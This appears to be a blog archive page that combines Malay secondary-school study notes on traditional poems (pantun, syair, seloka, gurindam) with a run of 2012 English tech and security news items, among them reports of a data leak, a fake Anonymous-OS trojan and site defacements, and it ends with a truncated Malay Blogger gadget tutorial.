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[Puisi Tradisional] Pantun Empat Kerat (Budi)


Rangkap 1
Seseorang yang berbudi, namanya pasti akan disebut-sebut.

Rangkap 2
Seseorang yang berbudi akan terus menjadi sebutan walaupun telah meninggal dunia.

Rangkap 3
Walaupun hanya sedikit budi yang ditaburkan akan tetap dikenang.

Rangkap 4
Perasaan kasih sayang yang wujud dalam diri seseorang akan menyebabkan hubungan
mereka berterusan ke akhir hayat.


Kelebihan mempunyai budi pekerti yang baik


1. Persoalan budi yang sentiasa dikenang walaupun telah meninggal dunia.
2. Persoalan ketinggian nilai budi.
3. Persoalan kasih sayang yang wujud sesama insan hasil daripada budi yang ditaburkan.


1. Terdiri daripada empat rangkap.
2. Setiap rangkap terdiri daripada empat baris
3. Jumlah perkataan dalam setiap baris antara tiga hingga lima.
 Anak itik terenang-renang (tiga perkataan)
 Jika tak kenang kepada saya (lima perkataan)
4. Terdiri daripada 9 hingga 11 suku kata.
 Terang bulan terang di paya (9 suku kata)
 Orang yang mati meninggalkan nama (11 suku kata)
5. Rima akhir pantun ini ialah abab
6. Bentuk pantun ini terikat dengan puisi tradisional.

Gaya Bahasa

1. Asonansi - Terang bulan terang di paya - pengulangan vokal a
2. Aliterasi – Orang yang mati meninggalkan nama. –pengulangan konsonan g
3. Kata ganda - Anak ikan terenang-renang
4. Sinkope – Jika tak kenang kepada saya
5. Repitasi - Terang bulan terang di paya


1. Nilai menghargai budi.
Budi yang ditabur oleh seseorang akan dikenang walaupun orang itu telah tiada.
2. Nilai keihlasan.
Keikhlasan menghulurkan budi kepada insan lain.


1. Kita haruslah berbudi kepada orang lain agar disanjung oleh masyarakat.
2. Kita mestilah ikhlas menabur budi agar kehidupan lebih sejahtera.3. Kita hendaklah menghargai budi yang dicurahkan oleh orang lain agar hubungan

[Puisi Tradisional] Pantun Empat Kerat (Jenaka dan Sindiran)


Rangkap 1
Seseorang isteri dianggap tidak sempurna walaupun memiliki kecantikan jika dia tidak tahu
melakukan kerja-kerja dapur.
Rangkap 2
Jika seseorang yang tidak berilmu cuba menunjukkan kepandaian, sudah pasti dia akan
Rangkap 3
Seseorang pemimpin tidak akan dapat berbuat apa-apa setelah kuasanya telah hilang
Rangkap 4
Perasaan bimbang apabila seseorang yang melakukan sesuatu di luar berkemampuan.
Rangkap 5
Perasaa hairan yang timbul apabila orang bawahan berjaya mengambil alih kuasa daripada
seseorang pemimpin yang berpengaruh.


Sindiran terhadap masyarakat yang bersikap luar biasa.


1. Persoalan tanggungjawab seorang isteri terhadap urusan rumah tangga.
2. Persoalan kepentingan memiliki ilmu pengetahuan.
3. Persoalan pemimpin yang kehilangan kuasa.
4. Persoalan kebimbangan melihat sesuatu perkara yang luar biasa .
5. Persoalan musibah yang berlaku akibat kelalaian.


1. Terdiri daripada lima rangkap.
2. Setiap rangkap terdiri daripada empat baris.
3. Jumlah perkataan dalam setiap baris antara 3 hingga 5.
 kupu-kupu terbang melintang (3 perkataan)
 kalau tak pandai menumbuk sambal (5 perkataan)
4. Terdiri daripada 9 hingga 11 suku kata.
Apa guna berkain batik (9 suku kata)
Apalah guna beristeri cantik (11 suku kata)
5. Rima akhir pantun ini ialah abab kecuali rangkap kedua, abac
6. Pantun ini adalah puisi terikat.

Gaya Bahasa

1. Asonansi - Kalau tidak memakai capal – pengulangan vokal a
2. Aliterasi - Melihat ikan memanjat kayu – pengulangan konsonan m
3. Sinkope - Kalau tak pandai menumbuk sambal
4. Personikasi
 Ikan kering lagi ketawa
 Mendengar tupai membaca kitab
5. Unsur alam
 Haiwan – ikan, tupai, harimau, kambing, burung, kupu-kupu
 Tumbuhan – rotan,saga


1. Nilai bertanggungjawab
Seseorang isteri bertanggungjawab menguruskan rumah tangga dengan baik.
2. Nilai kegigihan
Seseorang yang gigih berusaha bagi mencapai matlamatnya.
3. Nilai rasional
Seseorang yang rasional dalam melakukan sesuatu perkara.


1. Kita haruslah bertanggungjawab menguruskan rumah tangga agar kehidupan lebih
2. Kita mestilah gigih meningkatkan kemahiran diri agar tidak dipandang rendah.
3. Kita haruslah berfikir dan bertindak secara rasional agar tidak mendatangkan masalah
kepada orang lain.

[Puisi Tradisional] Syair Siti Sianah


Rangkap 1
Segelintir wanita berlebih-lebihan ketika berdandan seperti mencukur bulu roma di muka dan
membentuk kening. Mereka juga berhias dan memakai pakaian yang selengkapnya.

Rangkap 2
Terdapat segelintir wanita yang ketawa mengilai-ngilai. Malahan, di hadapan lelaki dia akan
menunjuk-nunjukkan mukanya supaya lelaki tersebut terpikat akan kecantikannya.

Rangkap 3
Ada sesetengah wanita yang suka bersolek dan berhias. Mereka juga sanggup membuang
masa di hadapan cermin bagi melihat wajah mereka.

Rangkap 4
Terdapat segelintir wanita yang tidak begitu cantik dan jelita. Malahan, hidungnya kembang dan
tidak mancung seperti besar mulut buaya. Namun, mereka tetap berhias.

Rangkap 5
Ada sesetengah wanita yang berperangai buruk. Mereka membuat sanggul siput untuk
menutup kekurangan rambut, malahan ada yang sanggup memakai rambut palsu.

Rangkap 6
Ada juga yang melumuri bedak di kaki, tangan, lengan dan jari sehinnga putih semata-mata
untuk mengaburi mata orang yang melihatnya akan kekurangan diri mereka.

Rangkap 7
Terdapat segelintir wanita yang suka dipuji. Mereka memakai gelang sehingga ke pangkal
lengan dengan tujuan untuk menarik perhatian. Mereka juga suka berpeleseran dengan lelaki.

Rangkap 8
Ada juga wanita yang mendedahkan kaki dan tangan dengan alasan untuk berubat.
Sebenarnya, niat mereka untuk membuatkan lelaki terpikat kepadanya. Namun, tindakan
mereka diketahui Allah.

Rangkap 9
Kita hendaklah memohon perlindungan daripada Allah agar kita akan terselamat daripada
segala kemungkaran, malahan dijauhi daripada berperangai seperti perempuan yang tidak

Rangkap 10
Sesetengah wanita suka berjudi sehingga tergadai barang kemas akibat perangai buruknya
selama ini.

Rangkap 11
Pergaulan bebas antara lelaki dan perempuan akan mengakibatkan berlakunya perlakuan yang
tidak senonoh. Mereka juga mengabaikan solat kerana hasutan syaitan.


Nasihat kepada golongan wanita bagi memelihara maruah diri.


1. Persoalan sikap wanita yang suka berhias hingga melanggar hukum syarak.
2. Persoalan ketaaatan kepada Allah.
3. Persoalan kesan buruk perjudian.
4. Persoalan pergaulan bebas antara lelaki dan perempuan.


1. Terdiri daripada sebelas rangkap.
2. Setiap rangkap terdiri daripada empat baris.
3. Jumlah perkataan dalam setiap baris antara 2 hingga 6 patah kata.
• mudah-mudahan dilepaskanlah (2 perkataan)
• kaki dan tangan lengan dan jari (6 perkataan)
4. Terdiri daripada 9 hingga 14 suku kata.
• Ianya elok tiada tandingnya (9 suku kata)
• Sesetengah perempuan terlalu janggalnya (11 suku kata)
5. Rima akhir syair ini ialah aaaa
6. Syair ini adalah puisi terikat.

Gaya Bahasa

1. Asonansi - Pengulangan huruf vokal - Sesetengah perempuan perangainya cela
pengulangan vokal e
2. Aliterasi - Melihat laki-laki ditampakkan muka pengulangan konsonan ki
3. Kata ganda - dibelek-belek, berjela-jela
4. Simile - Seperti taji berandam di keningnya ,
Seperti buaya besar mulutnya
5. Bahasa klasik - molek, cemara, intan serudi dan sempolah
6. Peribahasa - makan angkat


1. Nilai kesopanan
Seseorang wanita yang berada di khalayak ramai perlu bersopan santun seperti jangan
ketawa mengilai-ngilai.
2. Nilai kesederhanaan
Seseorang wanita perlu bersederhana dalam penampilan diri.3. Nilai ketaatan kepada agama.
Setiap tindakan yang ingin dilakukan oleh seseorang harus berlandaskan agama.
4. Nilai kesyukuran.
Bersyukurlah dengan kurniaan Tuhan dan menerima kekurangan diri.


1. Seseorang wanita haruslah menjaga adab dan perilaku agar dihormati oleh orang lain..
2. Seseorang wanita perlu bersederhana dalam penampilan diri, namun tidaklah secara
berlebih-lebihan agar tidak menimbulkan fitnah.
3. Kita tidak harus terlibat dengan sebarang aktiviti perjudian agar tidak berlakunya
4. Seseorang wanita haruslah menjaga batas pergaulan dengan golongan lelaki agar
terpelihara daripada maksiat

[Puisi Tradisional] Seloka Emak Si Randang


Seloka ini mengisahkan Emak Si Randang yang baik hati. Dia rela memasakkan makanan
untuk membantu orang dagang yang tidak dikenalinya. Emak Si Randang sanggup berhabishabisan bagi melayan tetamunya sehingga sanggup meruntuhkan rumah jika tidak berkayu.
Namun demikian, Emak Si Randang mengabaikan anaknya sendiri. Setelah orang dagang itu
pergi, Emak Si Randang terpaksa menanggung hutang kerana kehabisan beras sedangkan
padi yang ditanamnya tidak menjadi.


Sikap masyarakat yang terlalu mengagungkan orang luar berbanding ahli keluarga sendiri.


1. Persoalan rasional ketika melakukan sebarang tindakan
2. Persoalan pembaziran yang perlu dielakkan .
3. Persoalan tanggungjawab seorang ibu terhadap keluarga.


1. Terdiri daripada satu rangkap.
2. Bilangan baris dalam rangkap tersebut ialah 8 baris.
3. Jumlah perkataan dalam setiap baris antara 3 hingga 4.
• Dagang lalu ditanakkan (3 perkataan)
• Tiada kayu rumah diruntuhkan (4 perkataan)
4. Terdiri daripada 8 hingga 10 suku kata.
• Dagang lalu ditanakkan (8 suku kata)
• Tiada kayu rumah diruntuhkan (10 suku kata)
5. Rima akhir seloka ini ialah abbbbcac
6. Seloka ini berbentuk bebas.

Gaya Bahasa

1. Asonansi - Anak pulang kelaparan - a diulang 6 kali
2. Aliterasi - Anak dipangku diletakkan - k diulang 4 kali
3. Sinkope - Beras habis padi tak jadi ( baris 8)
4. AnaforaAnak pulang kelaparan
Anak di pangku diletakkan
5. Penggunaan peribahasa - Kera di hutan disusui
6. Hiperbola - Tiada kayu rumah diruntuhkan


1. Nilai kebijaksanaan.
Seseorang perlu bijaksana menggunakan akal fikiran dalam melakukan sesuatu

2. Nilai bertanggungjawab.
Seseorang ibu perlu bertanggungjawab terhadap kebajikan anak-anak.

3. Nilai berbudi
Kita disarankan berbudi kepada semua orang tetapi mestilah berpada-pada.


1. Kita janganlah melebih-lebihkan orang luar dan sebaliknya mengabaikan ahli keluarga
sendiri agar kehidupan lebih harmoni.
2. Kita mestilah menggunakan akal fikiran yang rasional dalam sebarang tindakan agar
tidak mendapatkan kesan yang buruk.
3. Kita hendaklah melayan tetamu dengan berpada-pada agar tidak berlakunya

[Puisi Tradisional] Syair Definisi Orang Berakal


Rangkap 1
Manusia yang berakal dipandang mulia,malahan golongan anbia dan aulia amat mementingkan
ilmu. Seseorang yang mencontohi golongan anbia dan aulia akan memperoleh kebahagian.

Rangkap 2
Golongan anbia dan aulia yang berilmu pengetahuan menyebabkan mereka dipilih sebagai
ketua dan menegakkan keadilan. Sesiapa yang mentafsirkan golongan tersebut kejam maka
dia bakal mendapat balasan.

Rangkap 3
Orang yang berakal mempunyai pandangan yang jauh. Dia akan bersahabat dengan orang
yang baik sahaja, sebaliknya mengenepikan orang yang jahat kerana takut terpengaruh dengan
sikap negatif mereka.

Rangkap 4
Orang yang berakal juga patuh kepada perintah Allah dan mengikut hukum syarak. Selain
berserah kepada Allah, mereka juga tidak tamak haloba kerana menyedari bahawa dunia ini
tidak kekal.

Rangkap 5
Orang yang berakal disayangi oleh golongan atasan, namun mereka tidak mengada-ngada,
tidak sombong dan menganggap status mereka sama sahaja dengan rakan taulan.

Rangkap 6
Jika pihak atasan memberikan perhatian yang lebih kepadanya, mereka sentiasa berwaspada.
Malahan mereka berusaha merapatkan hubungan dengan rakan-rakan, merendah diri dan
sedia berkhidmat.

Rangkap 7
Orang yang berakal tidak bosan dalam mengejar ilmu pengetahuan dan sentiasa membuat
penelitian untuk mencari jawapan agar tidak terpedaya.

Ciri-ciri orang yang berakal.


1. Persoalan ketinggian status orang yang berilmu (rangkap 1)
2. Persoalan kebijaksanaan orang yang berakal menyelesaikan masalah (rangkap 2)
3. Persoalan keinsafan seseorang akan kuasa Tuhan (rangkap 4)
4. Persoalan kepatuhan kepada hukum syarak (rangkap 4)
5. Persoalan keikhlasan dalam persahabatan (rangkap 6)


1. Terdiri daripada tujuh rangkap.
2. Setiap rangkap terdiri daripada empat baris.
3. Jumlah perkataan dalam setiap baris antara 3 hingga 5.
•Tiadalah ia melanja-lanja (3 perkataan)
•Sangatlah mengasihi tuan dan sahabat (5 perkataan)
4. Terdiri daripada sembilan hingga tiga belas suku kata.
• Jika ia dikasihi raja (9 suku kata)
• Sangatlah mengasihi orang yang jahat (11 suku kata)
5. Rima akhir syair ini ialah aaaa
6. Syair ini adalah puisi terikat.

Gaya Bahasa

1. Asonansi - Menjadi kepala bela bermacam - pengulangan vokal e
2. Aliterasi - Menjauhkan tamak hendak tawakal - pengulangan konsonan k
3. Sinkope – Ibanya tahu dunia tak kekal
4. Anafora - Tiadalah ia melanja-lanja
Tiadalah menyombong pada bekerja
5. Penggunaan kata klasik - tersunjam, ibanya, melanja-lanja, tersemu


1. Nilai kebijaksanaan.
Orang yang bijaksana akan dilantik sebagai pemimpin dan dipandang mulia.

2. Nilai kasih sayang
Seseorang yang berakal sangat mengasihi ketua dan rakan-rakannya.

3. Nilai ketaatan.
Seseorang yang berakal akan taat kepada hukum syarak.

4. Nilai kerajinan.
Orang yang berakal sentiasa menelaah untuk mendalami ilmu pengetahuan tanpa rasa


1. Kita haruslah mencontohi ciri-ciri orang yang berakal seperti para anbia dan aulia agar
kehidupan akan lebih bahagia.
2. Kita mestilah menyayangi sahabat yang baik dan menjauhi orang-orang yang bersikap
negatif agar tidak terpengaruh.
3. Kita haruslah merendah diri walaupun berilmu dan disayangi ramai agar terhindar
daripada sifat riak dan takbur.
4. Kita hendaklah patuh pada hukum syarak agar terhindar daripada kemungkaran.

[Puisi Tradisional] Gurindam 12 Fasal yang Keenam


Rangkap 1
Saranan supaya memilih teman yang dapat membantu ketika susah dan senang.

Rangkap 2
Saranan agar berguru dengan seseorang yang benar-benar berilmu dan dapat menyelesaikan
setiap kemusykilan.

Rangkap 3
Saranan supaya memilih isteri yang patuh dan setia kepada suami.

Rangkap 4
Saranan agar mencari teman yang memiliki semangat setiakawan


Nasihat bagi memilih orang yang ingin kita dampingi.


1. Persoalan kepentingan memilih sahabat yang boleh membahagiakan.
2. Persoalan kebijaksanaan dalam memilih guru .
3. Persoalan kepentingan mempunyai isteri yang setia .


1. Terdiri daripada empat rangkap.
2. Setiap rangkap terdiri daripada dua baris.
3. Jumlah perkataan dalam setiap baris antara empat hingga lima.
• Cahari olehmu akan sahabat (4 perkataan)
•Yang boleh tahukan tiap seteru (5 perkataan)
4. Terdiri daripada sembilan hingga sebelas suku kata.
•Yang boleh dijadikan ubat ( 9 suku kata)
• Cahari olehmu akan isteri ( 11 suku kata)
5. Rima akhir syair ini ialah aa
6. Bentuk gurindam ini terikat dengan puisi tradisional.

Gaya Bahasa

1. Asonansi - Cahari olehmu akan sahabat – pengulangan vokal a
2. Aliterasi - Yang boleh menyerahkan diri - pengulangan konsonan n
3. Sinkope - Cahari olehmu akan sahabat (rangkap 1 baris 1)
4. Penggunaan kata klasik : cahari
5. Penggunaan bahasa kiasan - Yang boleh menyerahkan diri (mahu menurut kata suami)


1. Nilai kebijaksanaan.
Kebijaksanaan seseorang memilih sahabat, guru dan isteri akan memberi manfaat kepadanya.

2. Nilai ketaatan.
Seorang isteri perlu taat dan setia kepada suami.

3. Nilai keikhlasan
Seseorang sahabat perlu ikhlas dalam menjalinkan perhubungan.


1. Kita haruslah mencari sahabat yang dapat memahami dan bersama-sama ketika susah dan senang.
2. Kita mestilah berguru dengan orang yang benar-benar bijaksana agar dapat membimbing kita.
3. Seseorang suami haruslah bijak memilih isteri yang setia agar perhubungan mereka berkekalan

3,452 Accounts Leaked from CricFire

Cricket fans who possess accounts on are advised to immediately change their passwords and monitor their inboxes for any malicious messages that may come their way. The warning is a result of a data breach that affected the site recently.

A hacker called Le0n B3lm0nt published a large part of the website’s database on Pastebin, including email addresses, usernames, password hashes and password salts.

Fortunately for the site’s customers, because the administrators salted the passwords, the chances for someone to decrypt them are low.

Nevertheless, as a precaution, passwords should be changed. Also, the email addresses leaked by the hackers represent a gold mine for cybercriminals who rely on spam campaigns to spread their malicious products.

For the time being, CriFire hasn’t displayed any messages to notify their customers on the incident, but hopefully they have taken all the necessary measures to ensure their safety.

iPad 3 Selling for £49.99 Was an IT Error, Tesco Confirms

Tesco, the British multinational grocery and general merchandise retailer, has upset a number of Apple fans who were eager to buy a third-generation iPad from the company for the attractive price of just £49.99 (60 EUR, or just over $78 US).

As the story goes, hundreds, if not thousands of customers hit “buy” on Tesco’s attractive offer only to find out that it was an IT error. The real price of the new iPad is in the hundreds of pounds.

The retailer said no money had been deducted from the customers’ credit cards.

"We always look to offer our customers unbeatable value but unfortunately this was due to an IT error, which has now been corrected. Most of our customers realised that this was an obvious mistake but we apologise for any inconvenience caused," the retailer said in a statement.

The Inquirer appropriately points out that, despite the backlash, the company’s terms and conditions for purchases specifically state that they can’t be held accountable for such a blunder if the goods haven’t shipped yet.

"Your order is an offer to buy from us. Nothing that we do or say will amount to any acceptance of that offer until we actually despatch an item to you, at which point a contract will be made between us. At any point up until then we may decline to supply an item to you," reads a note on Tesco Direct's website.

"If we decline to supply an item to you and you have already paid for it, we will give you a full refund of any amount already paid for that item in accordance with our refund policy," Tesco says.

Retailers just like Tesco around the world are gearing up to start selling Apple’s third-generation iPad tomorrow, March 16, at the same time Apple’s own retail stores plan on selling the new tablet device.

Google+ Becomes a Bigger Part of YouTube

The "Google+'ification" of Google product continues, to no one's surprise, with the further integration of YouTube and the aforementioned social network.

From now on, people that haven't yet created an YouTube account but already have a Google+ one, whomever they may be, will have the ability to create a new channel, aka YouTube account or more correctly YouTube profile, based on their Google+ one.

When signing up, they'll get the option of using their name, profile picture, data and so on from Google+ to fill out their YouTube channel info.

"We're adding a feature that lets you sign up for a new YouTube channel using your existing Google+ profile," YouTube explained.

"You can now use your Google+ profile name and photo on a new YouTube channel, giving you one consistent identity across platforms when uploading videos, sharing, commenting and other public activities," it added.

You can still sign up for YouTube with a different name and info and not link your Google+ profile, at least for now.

It's important here to make the distinction between an account and a profile. Currently, you can use YouTube completely signed out and relatively anonymously. You can watch videos, search for things and so on without providing the site with any credentials.

But you can also browse YouTube while signed into your Google account, giving you access to a couple more features, while still not maintaining an identity on the video site. Finally, you can create a YouTube profile, based on your Google account, which will become your YouTube identity enabling you to comment, upload videos and so on.

It works exactly the same way for Google+, you can use the site, to a degree, while signed out or while signed into Google but without creating a Google+ profile.

Now though, you'll be able to link the two, but only if you create a Google+ profile before you create a YouTube one. However, Google promises that users will eventually be able to merge their existing Google+ profiles with their YouTube ones.

FIFA 12 Update Adds Increased Security to FIFA Ultimate Team

Electronic Arts has just deployed a brand new update for its FIFA 12 soccer simulator, targeting the FIFA Ultimate Team and the EA Sports Football Club areas of the game by adding a new layer of security and solving some connection issues.

FIFA 12 became the most popular sports game of last year, impressing tens of millions of players from all over the world.

Sadly, security is a pretty big problem for the game, specifically its FIFA Ultimate Team feature, which sees players spend real money on premium content, as some hackers started phishing schemes that scammed people out of their FIFA 12 accounts.

Now, in order to add a new layer of security, EA has just deployed an update for FIFA 12 that forces players to answer a security question if they access the Ultimate Team mode from a new platform. Plenty of other things are also included, so check them all out below.

“We're committed to doing everything we can in our game to help keep you safe from phishers and scammers,” EA said. “Our March game update is key part of that commitment:
- It will now only be possible to send trade offers to people on your friends list.
- On entering FUT on your console for the first time after the update, you will be required to provide a unique answer to a security question.
- If anyone else attempts to enter your FUT account from a different console, they will be required to enter the answer to your security question.”

What’s more, the patch will also solve some end-of-game connection issues on the PC and PlayStation 3 platforms, as it seems that some players who had their Internet connection going through a router were disconnected because packets of crucial data weren’t being sent out.

“For some time now, a number of FUT gamers on PlayStation 3 and PC have suffered disconnections at the end of games. We will be deploying a fix for this problem as part of this update.”

In order to make amends with people affected by the problem, EA will be “compensating those people with a haul of FUT content significant enough to demonstrate just how thankful we are for sticking with us while we tackled the problem.”

The new update for FIFA 12 should already be available for download on the PC, PlayStation 3 and Xbox 360 platforms.

Anonymous-OS Live CD Based on Ubuntu is Fake !

Four days ago someone registered a new project on the SourceForge website, called Anonymous-OS, pretending that they are Anonymous.

Based on Ubuntu 11.10 and powered by the new MATE desktop environment created by the Linux Mint developers, the Anonymous-OS tries to be a Linux distribution packed with "hacking" tools for "checking the security of web pages".

The website created on tumblr for the Anonymous-OS Live CD project looks completely believable for some, not to mention that the Live CD's artwork and theme are preatty cool (see more screenshots below).

"The Anon OS is fake it is wrapped in trojans." confirmed Anonymous on their Twitter channel. "Seeing lots of news about just-released purported "Anonymous OS." BE CAREFUL! Remember the Zeus Trojan incident w/Slowloris recently!"

We are writing this piece of news just to inform the adventurous ones NOT to download this Live CD ISO image and test it, or event worse, install it on their machines.

Some of the tools provided in this Linux distribution are dangerous and you might end up in jail if you use them to attack web pages!

Download Backtrack 5 R2 instead, if you really want to test the security of web sites.

UNICEF Site Defaced by Wanz TD

Usually when hackers decide to deface a site, they do it to protest against something, or to show that its administrators failed to properly protect it. In this situation the reasons for which Malaysian hacker Wanz TD defaced the official site of UNICEF Georgia are unknown.

HackRead provided a screenshot to show that was breached, but there is no information to indicate why the site of an organization that does good in the world would be targeted.

“I bear witness that there is no god but Allah. I bear witness that Muhammad is Allah’s messenger. Allah is the Greatest,” the hackers wrote on the defaced page.

At the time of writing, the website still displays the image and the text posted by the hacker, but hopefully its admins will act on addressing the vulnerabilities that allowed for the incident to occur.

Bangladeshi Hackers Protest by Defacing 38 Sites

After gaining unauthorized access to a server that hosts commercial websites, the members of the Bangladeshi Grey Hat Hackers (BGHH) mass defaced 38 of them as a form of protest against India and the Bangladeshi government.

Even though the group’s name hints that they are grey hats, their actions resemble very much the ones usually performed by black hats.

Cyber War News provided the list of websites that were affected, most of them still being unavailable at the time of writing.

The messages posted on the breached sites reveal the collective’s discontent regarding the arrests of Bangladeshi hackers, among other things, threatening to “destroy” Indian cyberspace if their demands are not met.

“Stop hacking Bangladeshi sites, stop arresting BD hackers, stop border killing, else we will destroy your cyber space. We never forget, we never forgive, we never give up& shame on bsf..shame on Bangladeshi politics....please stop using Indian products right now in Bangladesh, and support us,” the hackers write.

iPhone 5 Reportedly Thinner Thanks to inCell Display

An analyst with Jefferies issued a research note this week catering to some of the tech industry’s most beloved rumors, including an Apple "iTV", and the iPhone 5.

On the latter, Jefferies analyst Peter Misek said, “We believe Apple is partnering with Toshiba Mobile Display on inCell technology for potential inclusion in the iPhone 5 or beyond.”

“Our view of inCell remains skeptical, but if they do achieve commercial yields we see this as almost as powerful a change as a move to OLED would be,” added Misek.

Thanks to inCell, Apple’s next iPhone would not only be thinner, it would boast an amazingly responsive touch-display, Misek said.

“It would remove the need for touch assemblies,” he noted, “allow them to reduce the thickness of iPhones considerably, and would enable unbelievably smooth and sensitive touch experiences for Apple devices,” he said.

There is much debate as to whether Apple will introduce its next iPhone at its annual Worldwide Developers Conference or during a special event this fall, much like the iPhone 4S.

It is also speculated that the company will drop the numbering, to be in line with “the new iPad” that just rolled out.

Peter Misek also reignited some Apple TV rumors this week telling investors that his recent visit to Asia had churned up some interesting information regarding the company’s plans with the business pillar that Tim Cook still labels as a “hobby”.

He stated in a research note, “we believe specialty components have begun to ship to Apple's Asia panel suppliers with polarized films, filters, and IGZO components starting to move in small quantities.”

Jefferies expects commercial production to commence in the May - June timeframe. Apple is said to plan an initial batch of 2M to 5M builds. The device is estimated to arrive at Apple’s retail outlets in the fourth quarter of this year, going by Misek’s estimates.

Apple Officially Confirms "New iPad" Availability in Stores

The company run by Tim Cook has just confirmed that its new iPad is set to arrive at Apple’s retail stores (and the Apple Online Store) on Friday, March 16 at 8:00 a.m. local time in the US and several other territories around the globe.

In addition to the United States, countries that are also in line to receive iPad shipments include Australia, Canada, France, Germany, Hong Kong, Japan, Singapore, Switzerland, the UK, Puerto Rico and the US Virgin Islands.

Starting March 23, the tablet will be available in several other countries, including Austria, Belgium, Bulgaria, Czech Republic, Denmark, Finland, Greece, Hungary, Iceland, Ireland, Italy, Liechtenstein, Luxembourg, Macau, Mexico, The Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Slovakia, Slovenia, Spain and Sweden.

“Every customer who buys a new iPad at an Apple retail store will be offered free Personal Setup service, helping them customize their iPad by setting up email, loading new apps from the App Store and more, so they’ll be up and running with their new iPad before they leave the store,” Apple said today.

Calling it the third generation of its “category defining mobile device,” the new iPad features a jaw-dropping Retina display, the new A5X chip with quad-core graphics, and a 5 megapixel iSight camera with advanced optics.

The tablet boasts the same 10-hour autonomy thanks to a larger (and perhaps technically-enhanced) battery, and a virtually unchanged design.

Discussing the new cellular version of the new iPad, Apple’s press release specifically states that “iPad Wi-Fi + 4G supports ultrafast 4G LTE networks in the US and Canada, and fast 3G networks around the world including those based on HSPA+ and DC-HSDPA.”

Customers will be able to grab their new iPad via Personal Pickup, a relatively new service available at Apple retail stores across the US.

Personal Pickup is an exclusive feature of the free Apple Store app on iOS devices, which lets customers shop from anywhere they are, then pick up their item at the closest Apple retail store.

Apple’s announcement also includes the names of several US retailers who will also be carrying the new tablet PC. These include Best Buy, Radio Shack, Sam’s Club, Target and Walmart.

Finally, Apple mentions that the iPad 2 is now available at an affordable $399 for the base (WiFi-only) configuration with 16GB. Higher-specced configurations are priced in accordance with their respective enhancements.

Hand Gestures Can Control UAV on Aircraft Carriers

A team of scientists at the Massachusetts Institute of Technology (MIT) is developing an imaging system that will enable unmanned aerial vehicles (UAV) aboard aircraft carriers to interpret and follow the commands of flight controllers directly, by recognizing their hand motions and gestures.

PhD student Yale Song, his advisor Randall Davis, and researcher David Demirdjian are leading the effort, which has already yielded a rough version of the future system. The work is based on the fact that traffic controllers already use established gesture patterns when controlling UAV.

In the future, the vision-based gesture recognition system currently being developed at MIT may be converted for other uses as well, such as in applications where users may be able to interact directly with their computers.

The basis of the entire system is a 3D camera and an advanced piece of software the team is developing.

6 “News of the World” Phone-Hacking Suspects Arrested

A number of six individuals suspected of being somehow involved in the News of the World (NotW) phone-hacking scandal have been detained and questioned by the Metropolitan Police as part of Operation Weeting.

Five men and one woman, aged between 38 and 49, were arrested yesterday morning sometime around 5AM - 7AM at their residences or workplaces in London, Oxfordshire, Hampshire and Hertfordshire.

They were apprehended on suspicion of conspiracy to pervert the court of justice, but they were all released on bail until further inquiries.

Last month, the name of one of the NotW hackers, previously known as “X”, was made public. Security consultant Philip Campbell Smith is suspected as being the one that gained access to army intelligence officer Ian Hurst’s personal data after sending him a maliciously crafted email.

Canon Is the Most Popular Camera Brand, Sortable Says

Surveys are very informative tools, not to mention fun (sometimes), and the latest that came to our attention was conducted by Sortable, a startup company based in Waterloo.

Using its Snapsort service, Sortable covered about 275,000 people in its recent survey meant to figure out the amount of interest in cameras and individual brands.

Consumers were split between DSLR and point and shoot camera, with 36% favorable towards each, whole 22% sought mirrorless cameras and 6% liked other types.

The study has also established that Canon is the most popular camera maker, having been named as the preference of 33% of those asked.

“In 2010, Sortable, a Waterloo-based startup company, launched, devoted to helping consumers find the right camera for them,” the company wrote.

“Sortable surveyed more than 275,000 people over a six month period and found that: In the ever-growing market for cameras, many brands have joined the war to become the best product. Canon, Nikon, Sony, Panasonic, Fujifilm and Olympus are among the many companies vying to come out on top. However, according to consumers, it is Canon that is winning the camera war.”

The second spot went to Nikon, who got 26% of the total, which left Sony on third place, with 15%.

It is quite interesting to note that mirrorless cameras are a relatively new invention, yet they already command such interest.

Canon may want to step up its game if it is going to hold onto its leading position. After all, it has yet to join the mirrorless segment, unlike Sony, Panasonic and Olympus.

Nikon also has to be fast, though it has an advantage since it recently started offering this sort of product.

If you want to easily figure out what camera you want, the Snapsort service can be found here. Sortable also has a service for finding TVs, laptops, phones and even tablets. Just drop by its website to use it.

Sony Entertainment Network Threatened by Socially Motivated Hackers

Sony is still feeling the effects of the April 2011 PlayStation Network hacks, and the company is deploying a new range of sociological tools in order to prevent or detect and then eliminate all threats aimed at the recently renamed Sony Entertainment Network.

Brett Wahlin, who is the Chief Security Officer at Sony, has stated when speaking with SC Magazine that, “The types of attacks we see are by groups with social agendas.

“The methods they use aren’t the same as the state-sponsored guys. At Sony, we are modifying our programs to deal less with state-sponsored and more with socially-motivated hackers.”

Wahlin added, “We are looking to see if there are there key elements within a person’s interaction with their environment. That could be interaction with badging systems, with telephones - when and who do they call - and with systems like browser habits and applications used.

“All these things allow us to set up a pattern for users, so when something different happens we can respond.”

Sony will closely monitor the behavior of all its employees, regardless of location and responsibility, in order to make sure that none of them displays abnormal behavior, which could be a sign that they have been compromised and they are being used by an outside organization to gain access.

The company is also trying to find patterns within customer spending on the Sony Entertainment Network in order to make sure that it can quickly track and eliminate those accounts that use stolen credit card data to buy content.

Last year the PSN was down for more than one month after an unknown group of attackers compromised the network and managed to get access to sensitive personal information, including the credit card data used by hundreds of thousands of users.

Sony has quickly introduced new security measures and promised that a repeat of the attack was impossible.

Menambahkan gajet recent comment di blog anda

Pada tutorial kali ini,saya akan memberikan anda satu tutorial untuk para blogger.Bagi blogger yang sudah berpengalaman atau mahir,mereka mungkin tidak memerlukan tutorial ini.
Tutorial kali ini bertajuk Menambahkan gajet recent comment di blog anda.

Apa yang akan berlaku setelah anda menambahkan gajet ini ke blog anda ialah reader anda akan dapat mengetahui tentang komen terbaru di blog anda.

Baiklah,mari kita mulakan tutorial ini.

Pertama sekali,anda login akaun blogger anda.
Kemudian,klik Design pada blog pilihan anda.
Setelah anda klik Design,anda akan dibawa kepada subpage Page Elements.
Anda perlu pilih tempat yang akan gajet itu keluar dan menekan Add a Gadget.
Akan keluar sebuah popup browser yang baru,ia akan meminta anda untuk memilih gadget yang anda ingin gunakan.
anda skrol ke bawah sedikit hingga anda jumpa Feed.Klik pada butang tambah disebelahnya untuk tambah gajet tersebut ke blog anda.
Seterusnya,masukkan link berikut pada kotak Feed URL

